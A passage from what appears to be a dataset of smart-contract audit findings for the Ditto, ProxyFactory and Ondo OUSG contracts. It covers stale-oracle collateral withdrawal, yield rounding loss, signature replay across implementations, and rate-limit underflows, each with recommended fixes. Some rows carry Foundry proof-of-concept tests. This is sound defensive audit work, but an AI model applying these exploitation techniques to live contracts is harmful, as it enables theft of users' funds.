calculated `cRatio` in line 94 of the `decreaseCollateral` function is based on the potentially outdated asset price, resulting in the collateral ratio being inaccurate and diverging from the actual collateral ratio based on the current asset spot price.\\nA short owner can exploit this by decreasing the short's collateral up to the point where the resulting collateral ratio is equal to the initial margin (i.e., 500%). As the collateral ratio, `cRatio`, is calculated in line 94 based on the outdated cached oracle price, the short owner can withdraw more collateral than the actual collateral ratio (based on the asset spot price) would allow.\\nSimilarly, the `increaseCollateral` function is affected as well.",Consider using the `LibOracle.getSavedOrSpotOraclePrice` function together with the `getCollateralRatioSpotPrice` function to calculate the collateral ratio based on the current asset price.,"Short-position owners can withdraw more collateral than eligible, negatively affecting the overall asset's collateral ratio.","```\\nfunction decreaseCollateral(address asset, uint8 id, uint88 amount)\\n external\\n isNotFrozen(asset)\\n nonReentrant\\n onlyValidShortRecord(asset, msg.sender, id)\\n{\\n STypes.ShortRecord storage short = s.shortRecords[asset][msg.sender][id];\\n short.updateErcDebt(asset);\\n if (amount > short.collateral) revert Errors.InsufficientCollateral();\\n short.collateral -= amount;\\n❌ uint256 cRatio = short.getCollateralRatio(asset);\\n if (cRatio < LibAsset.initialMargin(asset)) {\\n revert Errors.CollateralLowerThanMin();\\n }\\n uint256 vault = s.asset[asset].vault;\\n s.vaultUser[vault][msg.sender].ethEscrowed += amount;\\n LibShortRecord.disburseCollateral(\\n asset, msg.sender, amount, short.zethYieldRate, short.updatedAt\\n );\\n emit Events.DecreaseCollateral(asset, msg.sender, id, amount);\\n}\\n```\\n" +Loss of ETH yield due to rounding error when updating the yield rate in the `updateYield` function,low,"Updating the vault's yield 
rate in the `LibVault.updateYield` function can lead to a loss of yield if the newly received ETH yield is small due to rounding errors.\\nThe `updateYield` function in the `LibVault` library is called by the permissionless `YieldFacet.updateYield` function and used to update the vault's yield rate from staking rewards earned by bridge contracts holding LSD.\\nThe newly accumulated yield, i.e., ETH received since the last update, is calculated by subtracting the current `zethTotalNew` from the previously stored yield `zethTotal`, as seen in line 75 of the `updateYield` function.\\ncontracts/libraries/LibVault.sol#L92\\n```\\nfunction updateYield(uint256 vault) internal {\\n AppStorage storage s = appStorage();\\n STypes.Vault storage Vault = s.vault[vault];\\n STypes.VaultUser storage TAPP = s.vaultUser[vault][address(this)];\\n // Retrieve vault variables\\n uint88 zethTotalNew = uint88(getZethTotal(vault)); // @dev(safe-cast)\\n uint88 zethTotal = Vault.zethTotal;\\n uint88 zethCollateral = Vault.zethCollateral;\\n uint88 zethTreasury = TAPP.ethEscrowed;\\n // Calculate vault yield and overwrite previous total\\n if (zethTotalNew <= zethTotal) return;\\n uint88 yield = zethTotalNew - zethTotal;\\n Vault.zethTotal = zethTotalNew;\\n // If no short records, yield goes to treasury\\n if (zethCollateral == 0) {\\n TAPP.ethEscrowed += yield;\\n return;\\n }\\n // Assign yield to zethTreasury\\n uint88 zethTreasuryReward = yield.mul(zethTreasury).divU88(zethTotal);\\n yield -= zethTreasuryReward;\\n // Assign tithe of the remaining yield to treasuryF\\n uint88 tithe = yield.mulU88(vault.zethTithePercent());\\n yield -= tithe;\\n // Realize assigned yields\\n TAPP.ethEscrowed += zethTreasuryReward + tithe;\\n❌ Vault.zethYieldRate += yield.divU80(zethCollateral);\\n Vault.zethCollateralReward += yield;\\n}\\n```\\n\\nAfter determining the new `yield` (ETH), a fraction of the `yield` is assigned to the TAPP (treasury). 
Thereafter, the remaining `yield` is realized by adding it to the vault's `yield` rate (zethYieldRate), which is calculated by dividing the `yield` by the vault's short collateral, `zethCollateral`.\\n[!NOTE] Both the `yield` and `zethCollateral` values are in 18 decimal precision due to tracking ETH balances.\\nBy using the `divU80` function, the `zethYieldRate` is calculated as $zethYieldRate = \\frac{yield \\cdot 10^{18}}{zethCollateral}$\\nHowever, if the numerator is smaller than the denominator, i.e., the received ETH yield is very small and the vault's collateral large enough, the result of the division will be rounded down to 0, leading to a loss of the remaining yield.\\nAs anyone is able to call the public `YieldFacet.updateYield` function, this can be used to maliciously cause a loss of yield for all users if the newly received yield is small.\\nThe following test case demonstrates the described rounding error:\\n","Consider storing the rounding error and applying the correcting factor (error stored) the next time, or alternatively, prevent (skip) updating the yield if the resulting yield is 0.",Loss of LSD ETH yield for users of the same vault.,"```\\nfunction updateYield(uint256 vault) internal {\\n AppStorage storage s = appStorage();\\n STypes.Vault storage Vault = s.vault[vault];\\n STypes.VaultUser storage TAPP = s.vaultUser[vault][address(this)];\\n // Retrieve vault variables\\n uint88 zethTotalNew = uint88(getZethTotal(vault)); // @dev(safe-cast)\\n uint88 zethTotal = Vault.zethTotal;\\n uint88 zethCollateral = Vault.zethCollateral;\\n uint88 zethTreasury = TAPP.ethEscrowed;\\n // Calculate vault yield and overwrite previous total\\n if (zethTotalNew <= zethTotal) return;\\n uint88 yield = zethTotalNew - zethTotal;\\n Vault.zethTotal = zethTotalNew;\\n // If no short records, yield goes to treasury\\n if (zethCollateral == 0) {\\n TAPP.ethEscrowed += yield;\\n return;\\n }\\n // Assign yield to zethTreasury\\n uint88 zethTreasuryReward = 
yield.mul(zethTreasury).divU88(zethTotal);\\n yield -= zethTreasuryReward;\\n // Assign tithe of the remaining yield to treasuryF\\n uint88 tithe = yield.mulU88(vault.zethTithePercent());\\n yield -= tithe;\\n // Realize assigned yields\\n TAPP.ethEscrowed += zethTreasuryReward + tithe;\\n❌ Vault.zethYieldRate += yield.divU80(zethCollateral);\\n Vault.zethCollateralReward += yield;\\n}\\n```\\n" +Use of hardcoded price deviation in baseOracleCircuitBreaker(),low,"The `LibOracle::baseOracleCircuitBreaker()` uses the hardcoded value of 50% price deviation, which might be too large when using the ETH as a base price reference. Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\nThis report raises an issue regarding the `priceDeviation` variable only, as the `invalidFetchData` (2-hour stale check) was flagged as a known issue.\\nThe `baseOracleCircuitBreaker()` is used for verifying the price reported by Chainlink. If the reported price is invalid or its price deviation when compared to the protocol's cached oracle price is more than 50%, the function will fall back to get Uniswap's TWAP price instead.\\nHowever, the `baseOracleCircuitBreaker()` uses a hardcoded value of 50% price deviation (0.5 ether), which might be too large when using the ETH as a base price reference. 
Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\n```\\n //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n //@dev if there is issue with chainlink, get twap price. Compare twap and chainlink\\n if (invalidFetchData || priceDeviation) { //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n // rest of code\\n } else {\\n return chainlinkPriceInEth;\\n }\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L77-L78\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibOracle.sol#L81",The % price deviation should be a variable updatable by the protocol's DAO or admin in production.,"This report raises an issue regarding the `priceDeviation` variable only, as the `invalidFetchData` (2-hour stale check) was flagged as a known issue.\\nThe use of the hardcoded value of 50% price deviation (0.5 ether) might be too large when using the ETH as a base price reference. 
Moreover, the fixed % deviation is considered too risky because the protocol's DAO or admin will not be able to update it in production.\\nConsequently, the check for price deviation in the `baseOracleCircuitBreaker()` might not be effective enough for filtering out the stale price in production, directly affecting the quality of the oracle price that will be consumed by the core functions of the `Ditto` protocol (HIGH impact).","```\\n //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n function baseOracleCircuitBreaker(\\n uint256 protocolPrice,\\n uint80 roundId,\\n int256 chainlinkPrice,\\n uint256 timeStamp,\\n uint256 chainlinkPriceInEth\\n ) private view returns (uint256 _protocolPrice) {\\n bool invalidFetchData = roundId == 0 || timeStamp == 0\\n || timeStamp > block.timestamp || chainlinkPrice <= 0\\n || block.timestamp > 2 hours + timeStamp;\\n uint256 chainlinkDiff = chainlinkPriceInEth > protocolPrice\\n ? chainlinkPriceInEth - protocolPrice\\n : protocolPrice - chainlinkPriceInEth;\\n bool priceDeviation =\\n protocolPrice > 0 && chainlinkDiff.div(protocolPrice) > 0.5 ether;\\n\\n //@dev if there is issue with chainlink, get twap price. Compare twap and chainlink\\n if (invalidFetchData || priceDeviation) { //@audit -- this report raises an issue regarding the priceDeviation variable only, as the invalidFetchData (2-hour stale check) was flagged as a known issue\\n // rest of code\\n } else {\\n return chainlinkPriceInEth;\\n }\\n }\\n```\\n" +Emitting incorrect event value,low,"The `LibShortRecord::burnNFT()` emits an incorrect event value.\\nThe `burnNFT()` emits an incorrect event value: `nft.owner`. Specifically, the `nft` variable will point to the storage object specified by the `tokenId`. 
However, the pointing storage object will be deleted before emitting the `Transfer` event.\\nSubsequently, the `ERC721::Transfer` event will be emitted with `nft.owner` == `address(0)`.\\n```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L366\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L371\\nhttps://github.com/Cyfrin/2023-09-ditto/blob/a93b4276420a092913f43169a353a6198d3c21b9/contracts/libraries/LibShortRecord.sol#L374","Emit the `Transfer` event before the `delete` operations.\\n```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n// Add the line below\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n// Remove the line below\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n",The `ERC721::Transfer` is an 
important event. The incorrect event logs may cause off-chain services to malfunction.,"```\\n function burnNFT(uint256 tokenId) internal {\\n //@dev No need to check downcast tokenId because it is handled in function that calls burnNFT\\n AppStorage storage s = appStorage();\\n STypes.NFT storage nft = s.nftMapping[tokenId];\\n if (nft.owner == address(0)) revert Errors.NotMinted();\\n address asset = s.assetMapping[nft.assetId];\\n STypes.ShortRecord storage short =\\n s.shortRecords[asset][nft.owner][nft.shortRecordId];\\n delete s.nftMapping[tokenId];\\n delete s.getApproved[tokenId];\\n delete short.tokenId;\\n emit Events.Transfer(nft.owner, address(0), tokenId);\\n }\\n```\\n" +"The same signature can be used in different `distribution` implementation causing that the caller who owns the signature, can distribute on unauthorized implementations",high,"The same signature can be used in different `distribute` implementations causing that the caller who owns the signature, to `distribute` on unauthorized implementations.\\nThe ProxyFactory::setContest() function helps to configure a `closeTime` to specific `organizer`, `contestId` and `implementation`.\\n```\\nFile: ProxyFactory.sol\\n function setContest(address organizer, bytes32 contestId, uint256 closeTime, address implementation)\\n public\\n onlyOwner\\n// rest of code\\n// rest of code\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] != 0) revert ProxyFactory__ContestIsAlreadyRegistered();\\n saltToCloseTime[salt] = closeTime;\\n```\\n\\nThe caller who owns the signature, can distributes to winners using the deployProxyAndDistributeBySignature() function. 
The problem is that the hash in the code line (#159) does not consider the `implementation` parameter.\\n```\\nFile: ProxyFactory.sol\\n function deployProxyAndDistributeBySignature(\\n address organizer,\\n bytes32 contestId,\\n address implementation,\\n bytes calldata signature,\\n bytes calldata data\\n ) public returns (address) {\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, data)));\\n if (ECDSA.recover(digest, signature) != organizer) revert ProxyFactory__InvalidSignature();\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] == 0) revert ProxyFactory__ContestIsNotRegistered();\\n if (saltToCloseTime[salt] > block.timestamp) revert ProxyFactory__ContestIsNotClosed();\\n address proxy = _deployProxy(organizer, contestId, implementation);\\n _distribute(proxy, data);\\n return proxy;\\n }\\n```\\n\\nFor some reason, there could be a different `distribution` implementation to the same `contestId`. Then the caller who owns the signature can distribute even if the organizer does not authorize a signature to the new implementation.\\nI created a test where the caller who owns a signature can distribute to new `distribute implementation` using the same signature. Test steps:\\nOwner setContest using the implementation `address(distributor)`\\nOrganizer creates a signature.\\nCaller distributes prizes using the signature.\\nFor some reason there is a new distributor implementation. The Owner set the new distributor for the same `contestId`.\\nThe caller can distribute prizes using the same signature created in the step 2 in different distributor implementation.\\n```\\n// test/integration/ProxyFactoryTest.t.sol:ProxyFactoryTest\\n// $ forge test --match-test ""testSignatureCanBeUsedToNewImplementation"" -vvv\\n//\\n function testSignatureCanBeUsedToNewImplementation() public {\\n address organizer = TEST_SIGNER;\\n bytes32 contestId = keccak256(abi.encode(""Jason"", ""001""));\\n //\\n // 1. 
Owner setContest using address(distributor)\\n vm.startPrank(factoryAdmin);\\n proxyFactory.setContest(organizer, contestId, block.timestamp + 8 days, address(distributor));\\n vm.stopPrank();\\n bytes32 salt = keccak256(abi.encode(organizer, contestId, address(distributor)));\\n address proxyAddress = proxyFactory.getProxyAddress(salt, address(distributor));\\n vm.startPrank(sponsor);\\n MockERC20(jpycv2Address).transfer(proxyAddress, 10000 ether);\\n vm.stopPrank();\\n assertEq(MockERC20(jpycv2Address).balanceOf(proxyAddress), 10000 ether);\\n // before\\n assertEq(MockERC20(jpycv2Address).balanceOf(user1), 0 ether);\\n assertEq(MockERC20(jpycv2Address).balanceOf(stadiumAddress), 0 ether);\\n //\\n // 2. Organizer creates a signature\\n (bytes32 digest, bytes memory sendingData, bytes memory signature) = createSignatureByASigner(TEST_SIGNER_KEY);\\n assertEq(ECDSA.recover(digest, signature), TEST_SIGNER);\\n vm.warp(8.01 days);\\n //\\n // 3. Caller distributes prizes using the signature\\n proxyFactory.deployProxyAndDistributeBySignature(\\n TEST_SIGNER, contestId, address(distributor), signature, sendingData\\n );\\n // after\\n assertEq(MockERC20(jpycv2Address).balanceOf(user1), 9500 ether);\\n assertEq(MockERC20(jpycv2Address).balanceOf(stadiumAddress), 500 ether);\\n //\\n // 4. 
For some reason there is a new distributor implementation.\\n // The Owner set the new distributor for the same contestId\\n Distributor new_distributor = new Distributor(address(proxyFactory), stadiumAddress);\\n vm.startPrank(factoryAdmin);\\n proxyFactory.setContest(organizer, contestId, block.timestamp + 8 days, address(new_distributor));\\n vm.stopPrank();\\n bytes32 newDistributorSalt = keccak256(abi.encode(organizer, contestId, address(new_distributor)));\\n address proxyNewDistributorAddress = proxyFactory.getProxyAddress(newDistributorSalt, address(new_distributor));\\n vm.startPrank(sponsor);\\n MockERC20(jpycv2Address).transfer(proxyNewDistributorAddress, 10000 ether);\\n vm.stopPrank();\\n //\\n // 5. The caller can distribute prizes using the same signature in different distributor implementation\\n vm.warp(20 days);\\n proxyFactory.deployProxyAndDistributeBySignature(\\n TEST_SIGNER, contestId, address(new_distributor), signature, sendingData\\n );\\n }\\n```\\n","Include the `distribution implementation` in the signature hash.\\n```\\n function deployProxyAndDistributeBySignature(\\n address organizer,\\n bytes32 contestId,\\n address implementation,\\n bytes calldata signature,\\n bytes calldata data\\n ) public returns (address) {\\n// Remove the line below\\n// Remove the line below\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, data)));\\n// Add the line below\\n// Add the line below\\n bytes32 digest = _hashTypedDataV4(keccak256(abi.encode(contestId, implementation, data)));\\n```\\n","The caller who owns the signature, can distribute the prizes for a new distribution implementation using the same signature which was created for an old implementation. The `organizer` must create a new signature if there is a new implementation for the same `contestId`. 
The authorized signature is for one distribution implementation, not for future distribution implementations.\\nTools used\\nManual review","```\\nFile: ProxyFactory.sol\\n function setContest(address organizer, bytes32 contestId, uint256 closeTime, address implementation)\\n public\\n onlyOwner\\n// rest of code\\n// rest of code\\n bytes32 salt = _calculateSalt(organizer, contestId, implementation);\\n if (saltToCloseTime[salt] != 0) revert ProxyFactory__ContestIsAlreadyRegistered();\\n saltToCloseTime[salt] = closeTime;\\n```\\n" +Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever,medium,"The vulnerability relates to the immutability of `STADIUM_ADDRESS`. If this address is blacklisted by the token used for rewards, the system becomes unable to make transfers, leading to funds being stuck in the contract indefinitely.\\nOwner calls `setContest` with the correct `salt`.\\nThe Organizer sends USDC as rewards to a pre-determined Proxy address.\\n`STADIUM_ADDRESS` is blacklisted by the USDC operator.\\nWhen the contest is closed, the Organizer calls `deployProxyAndDistribute` with the registered `contestId` and `implementation` to deploy a proxy and distribute rewards. 
However, the call to `Distributor._commissionTransfer` reverts at Line 164 due to the blacklisting.\\nUSDC held at the Proxy contract becomes stuck forever.\\n```\\n// Findings are labeled with '<= FOUND'\\n// File: src/Distributor.sol\\n function _distribute(address token, address[] memory winners, uint256[] memory percentages, bytes memory data)\\n // rest of code\\n _commissionTransfer(erc20);// <= FOUND\\n // rest of code\\n }\\n // rest of code\\n function _commissionTransfer(IERC20 token) internal {\\n token.safeTransfer(STADIUM_ADDRESS, token.balanceOf(address(this)));// <= FOUND: Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever\\n }\\n```\\n","It is recommended to allow `STADIUM_ADDRESS` to be updatable by a dedicated admin role to avoid token transfer blacklisting. Moreover, since `STADIUM_ADDRESS` is no longer `immutable`, `storage` collision should be taken into account.","This vulnerability is marked as High severity because a blacklisted `STADIUM_ADDRESS` would lead to funds being locked in the Proxy address permanently. Funds are already held in the Proxy, and the Proxy's `_implementation` cannot be changed once deployed. 
Even the `ProxyFactory.distributeByOwner()` function cannot rescue the funds due to the revert.","```\\n// Findings are labeled with '<= FOUND'\\n// File: src/Distributor.sol\\n function _distribute(address token, address[] memory winners, uint256[] memory percentages, bytes memory data)\\n // rest of code\\n _commissionTransfer(erc20);// <= FOUND\\n // rest of code\\n }\\n // rest of code\\n function _commissionTransfer(IERC20 token) internal {\\n token.safeTransfer(STADIUM_ADDRESS, token.balanceOf(address(this)));// <= FOUND: Blacklisted STADIUM_ADDRESS address cause fund stuck in the contract forever\\n }\\n```\\n" +`InvestorBasedRateLimiter::setInvestorMintLimit` and `setInvestorRedemptionLimit` can make subsequent calls to `checkAndUpdateMintLimit` and `checkAndUpdateRedemptionLimit` revert due to underflow,low,"`InvestorBasedRateLimiter::_checkAndUpdateRateLimitState` L211-213 subtracts the current mint/redemption amount from the corresponding limit:\\n```\\nif (amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n\\nIf `setInvestorMintLimit` or `setInvestorRedemptionLimit` are used to set the limit amount for minting or redemptions smaller than the current mint/redemption amount, calls to this function will revert due to underflow.",Explicitly handle the case where the limit is smaller than the current mint/redemption amount:\\n```\\nif (rateLimit.limit <= rateLimit.currentAmount || amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n,"`InvestorBasedRateLimiter::setInvestorMintLimit` and `setInvestorRedemptionLimit` can make subsequent calls to `checkAndUpdateMintLimit` and `checkAndUpdateRedemptionLimit` revert due to underflow.\\nProof of Concept: Add this drop-in PoC to forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:\\n```\\nfunction test_setInvestorMintLimit_underflow_DoS() public initDefault(alice) {\\n // first perform a mint\\n uint256 mintAmount = 
rateLimiter.defaultMintLimit();\\n vm.prank(client);\\n rateLimiter.checkAndUpdateMintLimit(alice, mintAmount);\\n\\n // admin now reduces the mint limit to be under the current\\n // minted amount\\n uint256 aliceInvestorId = 1;\\n uint256 newMintLimit = mintAmount - 1;\\n vm.prank(guardian);\\n rateLimiter.setInvestorMintLimit(aliceInvestorId, newMintLimit);\\n\\n // subsequent calls to `checkAndUpdateMintLimit` revert due to underflow\\n vm.prank(client);\\n rateLimiter.checkAndUpdateMintLimit(alice, 1);\\n\\n // same issue affects `setInvestorRedemptionLimit`\\n}\\n```\\n\\nRun with: `forge test --match-test test_setInvestorMintLimit_underflow_DoS`\\nProduces output:\\n```\\nRan 1 test for forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:Test_InvestorBasedRateLimiter_setters_ETH\\n[FAIL. Reason: panic: arithmetic underflow or overflow (0x11)] test_setInvestorMintLimit_underflow_DoS() (gas: 264384)\\nSuite result: FAILED. 0 passed; 1 failed; 0 skipped; finished in 1.09ms (116.74µs CPU time)\\n```\\n",```\\nif (amount > rateLimit.limit - rateLimit.currentAmount) {\\n revert RateLimitExceeded();\\n}\\n```\\n +Prevent creating an investor record associated with no address,low,"`InvestorBasedRateLimiter::initializeInvestorStateDefault` is supposed to associate a newly created investor with one or more addresses but the `for` loop which does this can be bypassed by calling the function with an empty array:\\n```\\nfunction initializeInvestorStateDefault(\\n address[] memory addresses\\n ) external onlyRole(CONFIGURER_ROLE) {\\n _initializeInvestorState(\\n addresses,\\n defaultMintLimit,\\n defaultRedemptionLimit,\\n defaultMintLimitDuration,\\n defaultRedemptionLimitDuration\\n );\\n}\\n\\nfunction _initializeInvestorState(\\n address[] memory addresses,\\n uint256 mintLimit,\\n uint256 redemptionLimit,\\n uint256 mintLimitDuration,\\n uint256 redemptionLimitDuration\\n ) internal {\\n uint256 investorId = ++investorIdCounter;\\n\\n // @audit this `for` loop 
can by bypassed by calling\\n // `initializeInvestorStateDefault` with an empty array\\n for (uint256 i = 0; i < addresses.length; ++i) {\\n // Safety check to ensure the address is not already associated with an investor\\n // before associating it with a new investor\\n if (addressToInvestorId[addresses[i]] != 0) {\\n revert AddressAlreadyAssociated();\\n }\\n _setAddressToInvestorId(addresses[i], investorId);\\n }\\n\\n investorIdToMintState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: mintLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: mintLimitDuration\\n });\\n investorIdToRedemptionState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: redemptionLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: redemptionLimitDuration\\n });\\n}\\n```\\n",In `_initializeInvestorState` revert if the input address array is empty:\\n```\\nuint256 addressesLength = addresses.length;\\n\\nif(addressesLength == 0) revert EmptyAddressArray();\\n```\\n,"An investor record can be created without any associated address. 
This breaks the following invariant of the `InvestorBasedRateLimiter` contract:\\nwhen a new `investorId` is created, it should be associated with one or more valid addresses\\nProof of Concept: Add this drop-in PoC to forge-tests/ousg/InvestorBasedRateLimiter/setters.t.sol:\\n```\\nfunction test_initializeInvestor_NoAddress() public {\\n // no investor created\\n assertEq(0, rateLimiter.investorIdCounter());\\n\\n // empty input array will bypass the `for` loop that is supposed\\n // to associate addresses to the newly created investor\\n address[] memory addresses;\\n\\n vm.prank(guardian);\\n rateLimiter.initializeInvestorStateDefault(addresses);\\n\\n // one investor created\\n assertEq(1, rateLimiter.investorIdCounter());\\n\\n // not associated with any addresses\\n assertEq(0, rateLimiter.investorAddressCount(1));\\n}\\n```\\n\\nRun with: `forge test --match-test test_initializeInvestor_NoAddress`","```\\nfunction initializeInvestorStateDefault(\\n address[] memory addresses\\n ) external onlyRole(CONFIGURER_ROLE) {\\n _initializeInvestorState(\\n addresses,\\n defaultMintLimit,\\n defaultRedemptionLimit,\\n defaultMintLimitDuration,\\n defaultRedemptionLimitDuration\\n );\\n}\\n\\nfunction _initializeInvestorState(\\n address[] memory addresses,\\n uint256 mintLimit,\\n uint256 redemptionLimit,\\n uint256 mintLimitDuration,\\n uint256 redemptionLimitDuration\\n ) internal {\\n uint256 investorId = ++investorIdCounter;\\n\\n // @audit this `for` loop can by bypassed by calling\\n // `initializeInvestorStateDefault` with an empty array\\n for (uint256 i = 0; i < addresses.length; ++i) {\\n // Safety check to ensure the address is not already associated with an investor\\n // before associating it with a new investor\\n if (addressToInvestorId[addresses[i]] != 0) {\\n revert AddressAlreadyAssociated();\\n }\\n _setAddressToInvestorId(addresses[i], investorId);\\n }\\n\\n investorIdToMintState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: 
mintLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: mintLimitDuration\\n });\\n investorIdToRedemptionState[investorId] = RateLimit({\\n currentAmount: 0,\\n limit: redemptionLimit,\\n lastResetTime: block.timestamp,\\n limitDuration: redemptionLimitDuration\\n });\\n}\\n```\\n" +`InstantMintTimeBasedRateLimiter::_setInstantMintLimit` and `_setInstantRedemptionLimit` can make subsequent calls to `_checkAndUpdateInstantMintLimit` and `_checkAndUpdateInstantRedemptionLimit` revert due to underflow,low,"`InstantMintTimeBasedRateLimiter::_checkAndUpdateInstantMintLimit` L103-106 subtracts the currently minted amount from the mint limit:\\n```\\nrequire(\\n amount <= instantMintLimit - currentInstantMintAmount,\\n ""RateLimit: Mint exceeds rate limit""\\n);\\n```\\n\\nIf `_setInstantMintLimit` is used to set `instantMintLimit < currentInstantMintAmount`, subsequent calls to this function will revert due the underflow. The same is true for `_setInstantRedemptionLimit` and `_checkAndUpdateInstantRedemptionLimit`.","Explicitly handle the case where the limit is smaller than the current mint/redemption amount:\\n```\\nfunction _checkAndUpdateInstantMintLimit(uint256 amount) internal {\\n require(\\n instantMintLimit > currentInstantMintAmount && amount <= instantMintLimit - currentInstantMintAmount,\\n ""RateLimit: Mint exceeds rate limit""\\n );\\n}\\n\\nfunction _checkAndUpdateInstantRedemptionLimit(uint256 amount) internal {\\n require(\\n instantRedemptionLimit > currentInstantRedemptionAmount && amount <= instantRedemptionLimit - currentInstantRedemptionAmount,\\n ""RateLimit: Redemption exceeds rate limit""\\n );\\n}\\n```\\n",`InstantMintTimeBasedRateLimiter::_setInstantMintLimit` and `_setInstantRedemptionLimit` can make subsequent calls to `_checkAndUpdateInstantMintLimit` and `_checkAndUpdateInstantRedemptionLimit` revert due to underflow.,"```\\nrequire(\\n amount <= instantMintLimit - currentInstantMintAmount,\\n ""RateLimit: Mint exceeds rate 
limit""\\n);\\n```\\n" +Protocol may be short-changed by `BuidlRedeemer` during a USDC depeg event,low,"`OUSGInstantManager::_redeemBUIDL` assumes that 1 BUIDL = 1 USDC as it enforces receiving 1 USDC for every 1 BUIDL it redeems:\\n```\\nuint256 usdcBalanceBefore = usdc.balanceOf(address(this));\\nbuidl.approve(address(buidlRedeemer), buidlAmountToRedeem);\\nbuidlRedeemer.redeem(buidlAmountToRedeem);\\nrequire(\\n usdc.balanceOf(address(this)) == usdcBalanceBefore + buidlAmountToRedeem,\\n ""OUSGInstantManager::_redeemBUIDL: BUIDL:USDC not 1:1""\\n);\\n```\\n\\nIn the event of a USDC depeg (especially if the depeg is sustained), `BUIDLRedeemer` should return greater than a 1:1 ratio since 1 USDC would not be worth $1, hence 1 BUIDL != 1 USDC meaning the value of the protocol's BUIDL is worth more USDC. However `BUIDLReceiver` does not do this, it only ever returns 1:1.","To prevent this situation the protocol would need to use an oracle to check whether USDC had depegged and if so, calculate the amount of USDC it should receive in exchange for its BUIDL. 
If it is short-changed it would either have to revert preventing redemptions or allow the redemption while saving the short-changed amount to storage then implement an off-chain process with BlackRock to receive the short-changed amount.\\nAlternatively the protocol may simply accept this as a risk to the protocol that it will be willingly short-changed during a USDC depeg in order to allow redemptions to continue.","In the event of a USDC depeg the protocol will be short-changed by `BuidlRedeemer` since it will happily receive only 1 USDC for every 1 BUIDL redeemed, even though the value of 1 BUIDL would be greater than the value of 1 USDC due to the USDC depeg.","```\\nuint256 usdcBalanceBefore = usdc.balanceOf(address(this));\\nbuidl.approve(address(buidlRedeemer), buidlAmountToRedeem);\\nbuidlRedeemer.redeem(buidlAmountToRedeem);\\nrequire(\\n usdc.balanceOf(address(this)) == usdcBalanceBefore + buidlAmountToRedeem,\\n ""OUSGInstantManager::_redeemBUIDL: BUIDL:USDC not 1:1""\\n);\\n```\\n" +Consider allowing `ROUSG::burn` to burn dust amounts,low,"`ROUSG::burn` is used by admins to burn `rOUSG` tokens from any account for regulatory reasons.\\nIt does not allow burning a share amount smaller than 1e4, because this is less than a wei of `OUSG`.\\n```\\nif (ousgSharesAmount < OUSG_TO_ROUSG_SHARES_MULTIPLIER)\\n revert UnwrapTooSmall();\\n```\\n\\nDepending on the current and future regulatory situation it could be necessary to always be able to burn all shares from users.",Consider allowing the `burn` function to `burn` all remaining shares even if under the minimum amount.,,```\\nif (ousgSharesAmount < OUSG_TO_ROUSG_SHARES_MULTIPLIER)\\n revert 